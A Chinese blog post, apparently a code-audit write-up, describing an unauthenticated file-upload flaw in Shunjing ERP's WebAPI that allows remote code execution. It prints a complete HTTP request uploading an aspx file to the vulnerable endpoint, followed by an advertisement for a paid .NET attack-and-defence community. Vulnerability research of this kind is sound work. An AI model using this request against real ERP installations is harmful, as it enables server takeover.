某项目代码审计前台RCE

某位师傅给我发了一个顺景ERP的代码，并且跟我说是最新版本的，我们来看一看。

这是顺景ERP的目录结构，我们肯定是进行查看WEBAPI这个目录，一般API节课出现安全问题的比较多。

那么把bin目录下的文件载入进来，我们开始吧！

查看全局文件，其实这里可以看到是存在WebAPI当中的WebApiAppliaction当中的。

可以看到这个方法就是启动方法，其中的代码21行当中跟入这个类当中。

我们得到了对应的路由是如何进行传递的，看是跟入Controller。

在Controller当中

可以看到存在一个RequestAuthorize的注解一样的东西，这个就是鉴权，我们寻找没有这个注解一类的东西的方法处。

在上面可以看到一个方法可以直接进行文件上传，并且没有对应的检测，可以直接上传aspx文件。

请求包如下：

POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1Host: xxxxContent-Length: 155Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Origin: xxxxxContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9C4zXhY2gc6dn9QXAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close------WebKitFormBoundary9C4zXhY2gc6dn9QXContent-Disposition: form-data; name="file"; filename="1.aspx"1------WebKitFormBoundary9C4zXhY2gc6dn9QX--

20+专栏文章

星球文化始终认为授人以鱼不如授人以渔！星球整理出 20+ 个专题栏目涵盖 .NET安全 点、线、面、体等知识范围，助力师傅们实战攻防！其中主题包括.NET  内网攻防、漏洞分析、内存马、代码审计、预编译、反序列化、WebShell免杀、命令执行、工具库等等。

海量资源和工具

截至当前，dot.Net安全矩阵星球社区汇聚了 600+ 个实用工具和高质量PDF学习资料。这些资源涵盖了攻防对抗的各个方面，在实战中能够发挥显著作用，为对抗突破提供强有力的支持。

专属成员交流群

我们还有多个成员专属的内部星球陪伴群，加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问，以获取帮助迅速解决问题。

已入驻的大咖们

星球汇聚了各行业安全攻防技术大咖，并且每日分享.NET安全技术干货以及交流解答各类技术等问题，社区中发布很多高质量的.NET安全资源，可以说市面上很少见，都是干货。

欢迎加入我们

dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术，定位于高质量安全攻防星球社区，也得到了许多师傅们的支持和信任，通过星球深度连接入圈的师傅们，一起推动.NET安全高质量的向前发展。星球门票后期价格随着内容和质量的不断沉淀会适当提高，因此越早加入越好！ 

原文始发于微信公众号（哈拉少安全小队）：某项目代码审计前台RCE